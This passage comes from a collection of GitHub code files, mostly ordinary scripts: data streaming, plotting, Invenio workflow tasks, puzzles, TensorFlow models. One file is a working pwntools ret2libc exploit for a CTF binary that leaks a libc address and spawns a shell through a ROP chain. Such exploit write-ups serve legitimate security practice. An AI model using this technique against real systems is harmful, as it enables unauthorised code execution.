range(len(plantName)):\r\n entry = {\r\n 'timestamp': now,\r\n 'plantName': plantName[i],\r\n 'city': cityName[i],\r\n 'latitude': latitude[i],\r\n 'longitude': longitude[i],\r\n 'powerGeneration1': powerGeneration1[i],\r\n 'powerGeneration2': powerGeneration2[i],\r\n 'powerGeneration3': powerGeneration3[i],\r\n }\r\n json_data.append(entry)\r\n\r\n json_data1 = [{\r\n 'timestamp': now,\r\n 'tbe_value': tbe_value,\r\n 'ppp_value': ppp_value,\r\n 'tbp_value10': tbp_value10,\r\n 'tbp_value20': tbp_value20,\r\n 'tbp_value30': tbp_value30,\r\n 'sev_value1': sev_value1,\r\n 'sev_value2': sev_value2,\r\n 'totalGeneration': tbe_value + ppp_value + tbp_value10 + tbp_value20 + tbp_value30 + sev_value1 + sev_value2,\r\n 'totalTBP': tbp_value10 + tbp_value20 + tbp_value30,\r\n 'totalSEV': sev_value1 + sev_value2,\r\n 'tbe_cf': (tbe_value/(1000*24))*100,\r\n 'ppp_cf': (ppp_value/(341.17*24))*100,\r\n 'tbp_cf': ((tbp_value10 + tbp_value20 + tbp_value30)/(2100*24))*100,\r\n 'sev_cf': ((sev_value1 + sev_value2)/(1303*24))*100\r\n }]\r\n \r\n return json_data1\r\n\r\ndef record_data():\r\n data = collect_data()\r\n with open('lgd_daily_data.json', 'a') as file:\r\n json.dump(data, file)\r\n file.write('\\n')\r\n\r\nschedule.every(15).minutes.at(\":00\").do(record_data)\r\n\r\nwhile True:\r\n try:\r\n start_time = time.time()\r\n now = datetime.strftime(datetime.now(), \"%Y-%m-%dT%H:%M:%S%Z\")\r\n res = requests.post('powerBI API', data=json.dumps(json_data))\r\n print(res.status_code)\r\n # res1 = requests.post('powerBI API', 
data=json.dumps(json_data1))\r\n # print(res1.status_code)\r\n # print(json_data)\r\n # print(json_data1)\r\n print(collect_data())\r\n schedule.run_pending()\r\n \r\n #time.sleep(5)\r\n sleep_time = time.time() - start_time\r\n print(\"time taken in seconds \", int(sleep_time))\r\n print(\"------------------------------------------------------------------------\")\r\n if sleep_time < 30:\r\n time.sleep(30 - int(sleep_time))\r\n\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n continue\r\n","repo_name":"mosyaso/Data_Engineer_Project","sub_path":"ETL_Pipeline/Stream_Data_From_PI_to_PowerBI.py","file_name":"Stream_Data_From_PI_to_PowerBI.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15671185355","text":"# Напишите программу, которая принимает на вход координаты двух точек и находит расстояние между ними в 2D пространстве.\n# Пример:\n# A (3,6); B (2,1) -> 5,09\n# A (7,-5); B (1,-1) -> 7,21\n\n\n# Ускоренная обработка данных: lambda, filter, map, zip, enumerate, list comprehension.\n\nimport math\n\nfirst = [int(input('Введите координаты точки А: ')) for _ in range(2) ]\nsecond = [int(input('Введите координаты точки B: ')) for _ in range(2) ]\n\nres = round(sum([(elem[1] - elem[0])**2 for elem in zip(first, second)])**0.5 , 2)\nprint(f'Расстояние между точками А и В равно => {res}')\n","repo_name":"Jucharick/HW_python","sub_path":"Task_035.py","file_name":"Task_035.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34148615122","text":"# API - application programming interface\n\n# - is a set of commands, functions, protocols and objects that programmers can use to create software of interact with an external system\n# - a barrier between my program and an external system\n# - trying to use the rules that the API prescribed to make the request to the external system\n# - if the request is accoring the the rules from the API then the external system will send back a response with the data that you want\n\n# endpoint - the location that can be accessed to get the data\n\nimport requests\n\nURL = \"http://api.open-notify.org/iss-now.json\"\n\nresponse = requests.get(url=URL)\ndata = response.json()\n\nlongitude = data[\"iss_position\"][\"longitude\"]\nlatitude = data[\"iss_position\"][\"latitude\"]\n\niss_position = (longitude, latitude)\nprint(iss_position)\n","repo_name":"narcisabadea/100-days-of-code-python","sub_path":"Day33/Exercise 1 - API calls.py","file_name":"Exercise 1 - API calls.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26693836810","text":"import matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\n#import numpy as np\r\n\r\n# use ggplot style for more sophisticated visuals\r\nplt.style.use('ggplot')\r\nmpl.rcParams['toolbar'] = 'None'\r\n\r\ndef live_plotter(x_vec,y1_data,line1,y1_data_avg,line1_avg,y2_data,line2,y2_data_avg,line2_avg,identifier='',pause_time=0.1):\r\n \r\n if line1==[]:\r\n \r\n # this is the call to matplotlib that allows dynamic plotting\r\n plt.ion()\r\n# fig = plt.figure(figsize=(15,8))\r\n fig, (ax, ax2) = plt.subplots(2)\r\n\r\n ax.set_title('Landing Page')\r\n ax.set_xticks([],[])\r\n ax.set_ylabel('Milliseconds', fontsize='large')\r\n ax.set_ylim([0, 1000])\r\n# ax.grid(color='grey', linestyle='-', 
linewidth=0.25, alpha=0.5)\r\n \r\n ax2.set_title('Personal Action Plan')\r\n ax2.set_xticks([],[])\r\n ax2.set_ylabel('Milliseconds', fontsize='large') \r\n ax2.set_ylim([0, 1000])\r\n \r\n # create variables for the linse so we can later update them\r\n line1, = ax.plot(x_vec, y1_data, marker='o', color='blue', linewidth=1, markersize = 3)\r\n line1_avg, = ax.plot(x_vec, y1_data_avg, color='magenta', linewidth=0.5) \r\n \r\n line2, = ax2.plot(x_vec, y2_data, marker='o', color='green', linewidth=1, markersize = 3)\r\n line2_avg, = ax2.plot(x_vec, y2_data_avg, color='tomato', linewidth=0.5) \r\n \r\n plt.show() \r\n \r\n # after the figure, axis, and line are created, we only need to update the y-data\r\n line1.set_ydata(y1_data)\r\n line1_avg.set_ydata(y1_data_avg)\r\n line2.set_ydata(y2_data)\r\n line2_avg.set_ydata(y2_data_avg) \r\n \r\n #adjust limits if new data goes beyond bounds\r\n# if np.min(y1_data)<=line1.axes.get_ylim()[0] or np.max(y1_data)>=line1.axes.get_ylim()[1]:\r\n# plt.ylim([np.min(y1_data)-np.std(y1_data),np.max(y1_data)+np.std(y1_data)])\r\n# \r\n# if np.min(y2_data)<=line2.axes.get_ylim()[0] or np.max(y2_data)>=line2.axes.get_ylim()[1]:\r\n# plt.ylim([np.min(y2_data)-np.std(y2_data),np.max(y2_data)+np.std(y2_data)]) \r\n \r\n # this pauses the data so the figure/axis can catch up - the amount of pause can be altered above\r\n plt.pause(pause_time)\r\n \r\n # return line so we can update it again in the next iteration\r\n return line1, line1_avg, line2, line2_avg","repo_name":"petebchamp/PythonLearn","sub_path":"LogReader_Python/pylive.py","file_name":"pylive.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24714841617","text":"import glob\nimport os\nimport traceback\n\nfrom functools import wraps\n\nfrom six import callable\n\n\ndef approve_record(obj, eng):\n \"\"\"Will add the approval widget to the record.\n\n The workflow need to be halted to use the\n action in the holdingpen.\n :param obj: Bibworkflow Object to process\n :param eng: BibWorkflowEngine processing the object\n \"\"\"\n try:\n eng.halt(action=\"approval\",\n msg='Record needs approval')\n except KeyError:\n # Log the error\n obj.extra_data[\"_error_msg\"] = 'Could not assign action'\n\n\ndef was_approved(obj, eng):\n \"\"\"Check if the record was approved.\"\"\"\n extra_data = obj.get_extra_data()\n return extra_data.get(\"approved\", False)\n\n\ndef convert_record_to_bibfield(model=None):\n \"\"\"Convert to record from MARCXML.\n\n Expecting MARCXML, this task converts it using the current configuration to a\n SmartJSON object.\n\n :param obj: Bibworkflow Object to process\n :param eng: BibWorkflowEngine processing the object\n \"\"\"\n @wraps(convert_record_to_bibfield)\n def _convert_record_to_bibfield(obj, eng):\n from invenio.modules.workflows.utils import convert_marcxml_to_bibfield\n obj.data = convert_marcxml_to_bibfield(obj.data, model)\n eng.log.info(\"Field conversion succeeded\")\n return _convert_record_to_bibfield\n\n\ndef get_files_list(path, parameter):\n \"\"\"Function returning the list of file in a directory.\"\"\"\n @wraps(get_files_list)\n def _get_files_list(obj, eng):\n if callable(parameter):\n unknown = parameter\n while callable(unknown):\n unknown = unknown(obj, eng)\n\n else:\n unknown = parameter\n result = glob.glob1(path, unknown)\n for i in range(0, len(result)):\n result[i] = path + os.sep + result[i]\n return result\n\n return _get_files_list\n\n\ndef 
set_obj_extra_data_key(key, value):\n \"\"\"Task setting the value of an object extra data key.\"\"\"\n @wraps(set_obj_extra_data_key)\n def _set_obj_extra_data_key(obj, eng):\n my_value = value\n my_key = key\n if callable(my_value):\n while callable(my_value):\n my_value = my_value(obj, eng)\n if callable(my_key):\n while callable(my_key):\n my_key = my_key(obj, eng)\n obj.extra_data[str(my_key)] = my_value\n\n return _set_obj_extra_data_key\n\n\ndef get_obj_extra_data_key(name):\n \"\"\"Task returning the value of an object extra data key.\"\"\"\n @wraps(get_obj_extra_data_key)\n def _get_obj_extra_data_key(obj, eng):\n return obj.extra_data[name]\n\n return _get_obj_extra_data_key\n\n\ndef get_eng_extra_data_key(name):\n \"\"\"Task returning the value of an engine extra data key.\"\"\"\n @wraps(get_eng_extra_data_key)\n def _get_eng_extra_data_key(obj, eng):\n return eng.extra_data[name]\n\n return _get_eng_extra_data_key\n\n\ndef get_data(obj, eng):\n \"\"\"Task returning data of the object.\"\"\"\n return obj.data\n\n\ndef convert_record(stylesheet=\"oaidc2marcxml.xsl\"):\n \"\"\"Convert the object data to marcxml using the given stylesheet.\n\n :param stylesheet: which stylesheet to use\n :return: function to convert record\n :raise WorkflowError:\n \"\"\"\n @wraps(convert_record)\n def _convert_record(obj, eng):\n from invenio.modules.workflows.errors import WorkflowError\n from invenio.legacy.bibconvert.xslt_engine import convert\n\n eng.log.info(\"Starting conversion using %s stylesheet\" %\n (stylesheet,))\n\n if not obj.data:\n obj.log.error(\"Not valid conversion data!\")\n raise WorkflowError(\"Error: conversion data missing\",\n id_workflow=eng.uuid,\n id_object=obj.id)\n\n try:\n obj.data = convert(obj.data, stylesheet)\n except Exception as e:\n msg = \"Could not convert record: %s\\n%s\" % \\\n (str(e), traceback.format_exc())\n raise WorkflowError(\"Error: %s\" % (msg,),\n id_workflow=eng.uuid,\n id_object=obj.id)\n\n _convert_record.description = 'Convert record'\n return _convert_record\n\n\ndef update_last_update(repository_list):\n \"\"\"Perform the update of the update date.\"\"\"\n from invenio.legacy.oaiharvest.dblayer import update_lastrun\n\n @wraps(update_last_update)\n def _update_last_update(obj, eng):\n if \"_should_last_run_be_update\" in obj.extra_data:\n if obj.extra_data[\"_should_last_run_be_update\"]:\n repository_list_to_process = repository_list\n if not isinstance(repository_list_to_process, list):\n if callable(repository_list_to_process):\n while callable(repository_list_to_process):\n repository_list_to_process = repository_list_to_process(\n obj, eng)\n else:\n repository_list_to_process = [\n repository_list_to_process]\n for repository in repository_list_to_process:\n update_lastrun(repository[\"id\"])\n\n return _update_last_update\n\n\ndef quick_match_record(obj, eng):\n \"\"\"Retrieve the record Id from a record.\n\n Retrieve the record Id from a record by using tag 001 or SYSNO or OAI ID or\n DOI tag. 
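    When no explicit recid is present, the lookup falls back through the sysno, OAI id, external OAI id, and DOI helper lookups until one of them resolves a record id.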
opt_mod is the desired mode.\n\n 001 fields even in the insert mode\n\n :param obj: Bibworkflow Object to process\n :param eng: BibWorkflowEngine processing the object\n \"\"\"\n from invenio.legacy.bibupload.engine import (find_record_from_recid,\n find_record_from_sysno,\n find_records_from_extoaiid,\n find_record_from_oaiid,\n find_record_from_doi)\n from invenio.modules.records.api import Record\n\n identifier_function_to_check = {'recid': find_record_from_recid,\n 'system_number': find_record_from_sysno,\n 'oaiid': find_record_from_oaiid,\n 'system_control_number': find_records_from_extoaiid,\n 'doi': find_record_from_doi}\n\n record = Record(obj.data.dumps())\n try:\n identifiers = record.persistent_identifiers\n except Exception as e:\n # if anything goes wrong, assume we need to get it manually.\n eng.log.error(\"Problem with getting identifiers: %s\\n%s\"\n % (str(e), traceback.format_exc()))\n identifiers = []\n\n obj.extra_data[\"persistent_ids\"] = identifiers\n\n identifier_dict = {}\n for name, value in identifiers:\n value_dict = {}\n for dic in value:\n value_dict.update(dic)\n identifier_dict[name] = value_dict\n\n if \"recid\" in identifier_dict:\n # If there is a recid, we are good, right?\n obj.extra_data[\"persistent_ids\"][\"recid\"] = identifier_dict[\"recid\"]\n return True\n\n # So if there is no explicit recid key, then maybe we can find the record\n # using any of the other stable identifiers defined.\n found_recid = False\n for name, func in identifier_function_to_check.iteritems():\n if name in identifier_dict:\n if name in identifier_dict[name]:\n # To get {\"doi\": {\"doi\": val}}\n found_recid = func(identifier_dict[name][name])\n elif \"value\" in identifier_dict[name]:\n # To get {\"doi\": {\"value\": val}}\n found_recid = func(identifier_dict[name][\"value\"])\n\n if found_recid:\n break\n\n if found_recid:\n obj.extra_data[\"persistent_ids\"][\"recid\"] = found_recid\n return True\n return False\n\n\ndef upload_record(mode=\"ir\"):\n \"\"\"Perform the upload step.\"\"\"\n @wraps(upload_record)\n def _upload_record(obj, eng):\n from invenio.legacy.bibsched.bibtask import task_low_level_submission\n eng.log_info(\"Saving data to temporary file for upload\")\n filename = obj.save_to_file()\n params = [\"-%s\" % (mode,), filename]\n task_id = task_low_level_submission(\"bibupload\", \"bibworkflow\",\n *tuple(params))\n eng.log_info(\"Submitted task #%s\" % (task_id,))\n\n return _upload_record\n","repo_name":"chokribr/invenio","sub_path":"invenio/modules/workflows/tasks/marcxml_tasks.py","file_name":"marcxml_tasks.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74872893905","text":"# this is a dice making module\n# max is the max of the range\n# it will run the function roll(max) numOfDice times\n# ---------------------------------->\n\nfrom random import randint\n\ndef roll(max):\n r = randint(1, max)\n print(r)\n return r\n\ndef roll_a_bunch(max, numOfDice):\n rolls = []\n for i in range(numOfDice):\n rolls.append(roll(max))\n\n return rolls\n\ndef roll_distro(max, numOfDice=4):\n # roll a bunch of die or number of times\n rolls = roll_a_bunch(max, numOfDice)\n\n distribution = {}\n\n # count what is rolled\n # if key in dict: return dict[key] else: return default\n for each in rolls:\n currentCount = distribution.get(each, 0)\n print(\"Current count of\", each, \":\", currentCount)\n currentCount += 1\n distribution[each] = currentCount\n\n output = 
\"\"\n for roll in distribution:\n output += \"Number \" + str(roll) + \" was rolled \" + str(distribution[roll]) + \" times\\n\"\n\n print(output)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"PDXDevCampJuly/michael_devCamp","sub_path":"python/dice/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"464722875","text":"from typing import List\n\n\ndef allPathsSourceTarget(graph: List[List[int]]) -> List[List[int]]:\n ret = []\n path = []\n def dfs(i):\n if i == len(graph) - 1:\n ret.append(path[:])\n return\n for to in graph[i]:\n path.append(to)\n dfs(to)\n path.pop()\n \n path.append(0)\n dfs(0)\n return ret\n\n\nif __name__ == \"__main__\":\n graph = [[1, 2], [3], [3], []]\n result = allPathsSourceTarget(graph)\n correct_result = [[0, 1, 3], [0, 2, 3]]\n print(\"Expected:\")\n print(correct_result)\n print(\"Output:\")\n print(result)\n","repo_name":"giwankim/algo","sub_path":"leetcode/797-all-paths-from-source-to-target/all_paths.py","file_name":"all_paths.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21744177689","text":"#!/usr/bin/python3\n# Author: Hack.You\nfrom pwn import *\nimport warnings\n\n# Allows you to switch between local/GDB/remote from terminal\ndef start(argv=[], *a, **kw):\n if args.GDB: # Set GDBscript below\n return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)\n elif args.REMOTE: # ('server', 'port')\n return remote(sys.argv[1], sys.argv[2], *a, **kw)\n else: # Run locally\n return process([exe] + argv, *a, **kw)\n\n\n# Specify GDB script here (breakpoints etc)\ngdbscript = '''\ninit-pwndbg\ncontinue\n'''.format(**locals())\n\n# Binary filename\nexe = './karma'\n# This will automatically get context arch, bits, os etc\nelf = context.binary = ELF(exe, checksec=False)\n# Change logging level to help with debugging (error/warning/info/debug)\ncontext.log_level = 'info'\nwarnings.filterwarnings(\"ignore\", category=BytesWarning, message=\"Text is not bytes; assuming ASCII, no guarantees.\")\n\n# ===========================================================\n# EXPLOIT GOES HERE\n# ===========================================================\n\n# Start program\nio = start()\n\n# Load libc library (identified version from server - https://libc.blukat.me)\n# libc = ELF('libc6_2.35-0ubuntu3.1_amd64.so')\nlibc = elf.libc\n\noffset = 88\n\npop_rdi = 0x0000000000401196 # pop rdi; ret;\npop_rsi = 0x0000000000401198 # pop rsi; ret; \npop_rdx = 0x000000000040119a # pop rdx; ret; \n\nret = 0x000000000040101a # ret; \n\n\npayload = flat({\n offset: [\n pop_rdi,\n 0x1,\n pop_rsi,\n elf.got['write'],\n pop_rdx,\n 0x20,\n elf.plt['write'],\n elf.symbols['main']\n ]\n})\n\nio.recvuntil('headed.')\nio.sendline('A')\n\n# Leak address\nio.sendline(payload) \nio.recvline()\nio.recvuntil('network?')\nio.recvline()\ngot_write = unpack(io.recv()[:6].ljust(8, b\"\\x00\"))\ninfo(\"got write: %#x\", got_write)\n\n# Calculate libc base\nlibc.address = got_write - libc.symbols['write']\ninfo(\"libc_base: %#x\", libc.address)\n\nsh = next(libc.search(b'/bin/sh\\x00'))\nsystem = libc.symbols['system']\ninfo('/bin/sh: %#x', sh)\ninfo('system: %#x', system)\n\n# Payload to spawn shell\npayload = flat({\n offset: [\n pop_rdi, # System(\"/bin/sh\")\n sh,\n ret,\n system\n 
]\n})\n\nio.sendline('A')\nio.sendline(payload)\n\nio.interactive()\n","repo_name":"markuched13/markuched13.github.io","sub_path":"solvescript/bicdefcon_23/karma/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34646862225","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 17 17:18:46 2015\n\n@author: nelmntrx\n\"\"\"\n\n'''MISCELLANEOUS FUNCTIONS for looping'''\n\nimport numpy as np\nfrom sympy.combinatorics.permutations import Permutation\nimport networkx as nx\nimport string as st\nimport itertools\nimport matplotlib.pyplot as plt\n\n\n\ndef return_string(array): #connects a list of letters for cube_maker\n# baliktaran = iter(array)\n return ''.join(array)\n\n\ndef path(string): #returns a graph with nodes and edges that is exactly the same in a pocket cube\n pocketcube = nx.Graph()\n for letter in string:\n pocketcube.add_node(letter)\n edges = [(string[0],string[22]),(string[0],string[1]), (string[0],string[2]),\n (string[0],string[4]), (string[1],string[23]), (string[1],string[9]),\n (string[1],string[3]),(string[2],string[3]),(string[3],string[8]),\n (string[3],string[7]),(string[2],string[5]),(string[2],string[6]),\n (string[4],string[22]),(string[4],string[10]),(string[5],string[11]),\n (string[5],string[6]),(string[6],string[7]),(string[6],string[12]),\n (string[7],string[8]),(string[7],string[13]),(string[8],string[9]),\n (string[8],string[14]),(string[9],string[15]),(string[9],string[23]),\n (string[10],string[20]),(string[10],string[11]),(string[10],string[18]),\n (string[11],string[16]),(string[11],string[12]),(string[12],string[13]),\n (string[12],string[16]),(string[13],string[14]),\n (string[13],string[17]),(string[14],string[15]),(string[14],string[17]),\n (string[15],string[21]),(string[15],string[19]),(string[16],string[18]),\n (string[16],string[17]),(string[17],string[19]),(string[19],string[21]),\n (string[18],string[20]),(string[20],string[21]),(string[20],string[22]),\n (string[21],string[23]),(string[22],string[23]), (string[18], string[19])]\n pocketcube.add_edges_from(edges)\n \n\n return nx.shortest_path_length(pocketcube)\n\ndef show(string):\n pocketcube = nx.Graph()\n for letter in string:\n pocketcube.add_node(letter)\n edges = [(string[0],string[22]),(string[0],string[1]), (string[0],string[3]),\n (string[0],string[4]), (string[1],string[23]), (string[1],string[9]),\n (string[1],string[2]),(string[2],string[3]),(string[2],string[8]),\n (string[2],string[7]),(string[3],string[5]),(string[3],string[6]),\n (string[4],string[22]),(string[4],string[10]),(string[5],string[11]),\n (string[5],string[6]),(string[6],string[7]),(string[6],string[12]),\n (string[7],string[8]),(string[7],string[13]),(string[8],string[9]),\n (string[8],string[14]),(string[9],string[15]),(string[9],string[23]),\n (string[10],string[10]),(string[10],string[11]),(string[10],string[18]),\n (string[11],string[16]),(string[11],string[12]),(string[12],string[13]),\n (string[12],string[13]),(string[12],string[16]),(string[13],string[14]),\n (string[13],string[17]),(string[14],string[15]),(string[14],string[17]),\n (string[15],string[21]),(string[15],string[19]),(string[16],string[18]),\n (string[16],string[17]),(string[17],string[19]),(string[19],string[21]),\n (string[18],string[20]),(string[20],string[21]),(string[20],string[22]),\n (string[21],string[23]),(string[22],string[23]), (string[18], string[19])]\n pocketcube.add_edges_from(edges)\n\n 
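    # label each node with its own letter, lay the graph out randomly, and overlay the labels; note nx.draw is called without pos, so the labels may not line up with the drawn nodes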
labels = {}\n for node in pocketcube.nodes():\n labels[node] = node\n\n pos = nx.random_layout(pocketcube)\n nx.draw(pocketcube, pos, with_labels=False)\n nx.draw_networkx_labels(pocketcube, pos, labels, node_size=20, node_color='r' )\n plt.show()\n return "This is state: %s" %string\n \n \ndef network(string):\n pocketcube = nx.Graph()\n for letterA in string:\n pocketcube.add_node(letterA)\n listahan = path(string)[letterA]\n for letterB in listahan:\n if letterA != letterB:\n pocketcube.add_edge(letterA, letterB, weight = listahan[letterB])\n return pocketcube\n\n#solved_state = 'ABCDEFGHIJKLMNOPQRSTUVWX'\n#\n#graph = network(solved_state)\n##for edge in graph.edges():\n## print edge\n## print nx.from_edgelist(graph)\n#print nx.algebraic_connectivity(graph)\n#print nx.average_clustering(graph)\n#print nx.transitivity(graph)\n#print nx.diameter(graph)\n\n\n\n\n# label = 'network({})'.format(string)\n# return nx.write_dot(pocketcube, label) \n \n \n \n# labels = {}\n# for node in pocketcube.nodes():\n# labels[node] = node\n# edge_labels = dict([((u,v), d['weight']) for u,v,d in pocketcube.edges(data=True)])\n# \n# pos = nx.spring_layout(pocketcube)\n# nx.draw(pocketcube, with_labels=False,node_size=10)\n# nx.draw_networkx_labels(pocketcube, pos, font_size=13,font_family='sans-serif')\n# nx.draw_networkx_edge_labels(pocketcube, pos,edge_labels=edge_labels)\n# \n# \n# pylab.show()\n#state = 'ABCDEFGHIJKLMNOPQRSTUVWX'\n#graph = network(state)\n#label = 'network({})'.format(state)\n#print nx.write_dot(graph,label)","repo_name":"WynnImproso/old_codes","sub_path":"way way back/CODES/Pocket Cube/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"14062898912","text":"subject_number = 7\ncard_pub = 12320657\ndoor_pub = 9659666\n\ndef transform(val, subj):\n return (val*subj) % 20201227\n\ndef get_loops(pub_key):\n val = 1\n loops = 0\n while val != pub_key:\n loops += 1\n val = transform(val, subject_number)\n return loops\n\ndef get_both_loops():\n card_loops = get_loops(card_pub)\n door_loops = get_loops(door_pub)\n return card_loops, door_loops\n\ndef get_key():\n card_loops, door_loops = get_both_loops()\n val = 1\n while card_loops:\n val = transform(val, door_pub)\n card_loops -= 1\n card_key = val\n val = 1\n while door_loops:\n val = transform(val, card_pub)\n door_loops -= 1\n door_key = val\n return card_key, door_key\n\nif __name__ == '__main__':\n print(get_key())","repo_name":"jefallon/adventofcode2020","sub_path":"Day25a.py","file_name":"Day25a.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"27269443155","text":"# Built-in\nimport argparse\nfrom os import path\nimport random\nrandom.seed(7123)\n\n# Libs\nimport tensorflow as tf\nimport numpy as np\nimport pickle\n\n# Custom\nimport utils\nimport constants\n\n# Globals\nINPUT_LAYER = '{}/input_images:0'\n\nEXTRACT_CONFIG = {\n # model_name -> (target_layer, dim_size, input_dimension)\n 'netnet_sf.pb' : [\n ('netnet_sf.pb/MobilenetV1/Predictions/Reshape:0', 29, 160),\n ('netnet_sf.pb/MobilenetV1/Logits/Dropout_1b/Identity:0', 512, 160)\n ],\n 'structured_test.pb' : [\n ('structured_test.pb/MobilenetV1/Logits/SpatialSqueeze:0', 100, 224)\n ],\n 'sf_structured_progress.pb' : [\n ('sf_structured_progress.pb/MobilenetV1/Logits/SpatialSqueeze:0', 256, 224)\n ],\n 'stanford_products_val_removed.pb' : [\n 
('stanford_products_val_removed.pb/MobilenetV1/Logits/SpatialSqueeze:0', 256, 224)\n ]\n}\n\n# Helpers\ndef saveFeatures(features, labels, model_path, input_path, labels_dict):\n data = ({'features' : features, 'labels' : labels}, labels_dict)\n outfile_name = \"{}_{}_data.pkl\".format(path.basename(model_path.strip('/')), path.basename(input_path.strip('/')))\n outfile_name = path.join('..', 'embeddings', outfile_name)\n with open(outfile_name, 'wb') as outf:\n pickle.dump(data, outf, protocol=pickle.HIGHEST_PROTOCOL)\n print(\"Saved {} features with dimension {} and {} labels.\".format(features.shape[0], features.shape[1], labels.shape[0]))\n print(\"Destination: {}\".format(outfile_name))\n\ndef selectTarget(model_path):\n model = path.basename(model_path.rstrip('/'))\n options = EXTRACT_CONFIG[model]\n print(\"Select one of the following options [0-{}]:\".format(len(options)-1))\n for i, o in enumerate(options):\n print(\" [{}] Layer '{}' with dimension {}\".format(i, *o))\n while True:\n selection = input('Selection: ')\n try:\n selection = int(selection)\n break\n except ValueError:\n print('Invalid selection, please try again.')\n print(\"\")\n return options[selection]\n\n\n# Main\n\ndef runInference(model_path, input_paths, data_type, args = None):\n model_name = path.basename(model_path)\n target, dim_size, image_size = selectTarget(model_path)\n dataset_iterator, labels_dict = utils.loadImageDataset(input_paths, data_type, image_size)\n\n with tf.Session() as sess:\n # Load model\n utils.loadModel(model_path, path.basename(model_path), print_layers=False)\n # Get layer outputs\n features_node = sess.graph.get_tensor_by_name(target)\n # Init storage arrays\n features = np.empty((0, dim_size), np.float32)\n labels = np.empty((0,), np.int32)\n n_processed = 0\n # Eval loop\n while True:\n try:\n # Evaluate batch\n try:\n X, y = sess.run(dataset_iterator.get_next())\n X /= 255.0\n except tf.errors.InternalError:\n continue\n feed_dict = {INPUT_LAYER.format(model_name) : X}\n target_output = sess.run(features_node, feed_dict = feed_dict)\n target_output = np.squeeze(target_output) \n # Stack outputs\n features = np.vstack((features, target_output))\n labels = np.hstack((labels, y)) \n # Logging\n n_processed += constants.BATCH_SIZE\n if n_processed % (10 * constants.BATCH_SIZE) == 0: \n print(\"Processed {} records.\".format(n_processed))\n except tf.errors.OutOfRangeError:\n break\n print(\"Completed extracting features. 
\\n\")\n return features, labels, labels_dict\n\ndef setupArgs():\n def validDataType(data_type):\n if data_type not in ['tfr', 'img', 'jpeg', 'jpg', 'png']: raise ValueError()\n return data_type\n parser = argparse.ArgumentParser(description='Extract activations from trained models.')\n parser.add_argument('model_path', help='path to model file')\n parser.add_argument('data_type', help='one of {img, jpeg, jpg, tfr}', type=validDataType)\n parser.add_argument('input_path', help='path to image files')\n args = parser.parse_args()\n print(\"\")\n return args\n\ndef main():\n args = setupArgs()\n features, labels, labels_dict = runInference(args.model_path, args.input_path, args.data_type, args)\n saveFeatures(features, labels, args.model_path, args.input_path, labels_dict)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zachmaurer/fast-novelty-detection","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"23447063296","text":"import sys\nfrom collections import deque\n\ninput = lambda : sys.stdin.readline().rstrip()\n\nbridge = deque([0,0])\nN, W, L = map(int, input().split()) # 다리를 건너는 트럭의 수 / 다리의 길이 / 다리의 최대 하중\nbridge = deque([0]*W)\ntrucks = deque(list(map(int, input().split())))\n\nnow_weight = 0\nanswer = 0\nwhile trucks :\n answer += 1\n # 이동\n now_weight -= bridge.popleft()\n # 들어갈 수 있는지 확인\n if now_weight + trucks[0] <= L :\n now_weight += trucks[0]\n bridge.append(trucks.popleft())\n else :\n bridge.append(0)\nprint(answer+W)","repo_name":"JoungMinJu/PyCodingTest","sub_path":"Reis/que/BOJ_13335.py","file_name":"BOJ_13335.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27170235812","text":"import tensorflow as tf\nimport numpy as np\nimport sys\n\n#sys.setrecursionlimit(1000000)\n\n\n\"\"\"\n残差网络\n\"\"\"\n\nnMoudel=1#hourglass 中residual 模块的数量\nLRNKernel=11\n\ndef batch_norm(input_images):\n # Batch Normalization批归一化\n # ((x-mean)/var)*gamma+beta\n #输入通道维数\n #parms_shape=[input_images.get_shape()[-1]]\n #parms_shape=tf.shape(input_images)[-1]\n ##print(parms_shape)\n #offset\n beta=tf.Variable(tf.constant(0.0,tf.float32),name='beta',dtype=tf.float32)\n #scale\n gamma=tf.Variable(tf.constant(1.0,tf.float32),name='gamma',dtype=tf.float32)\n #为每个通道计算均值标准差\n mean,variance=tf.nn.moments(input_images, [0, 1, 2], name='moments')\n y=tf.nn.batch_normalization(input_images,mean,variance,beta,gamma,0.001)\n y.set_shape(input_images.get_shape())\n\n return y\n\n\ndef batch_norm_relu(x):\n r_bn=batch_norm(x)\n r_bnr=tf.nn.relu(r_bn,name='relu')\n return r_bnr\n\n\ndef 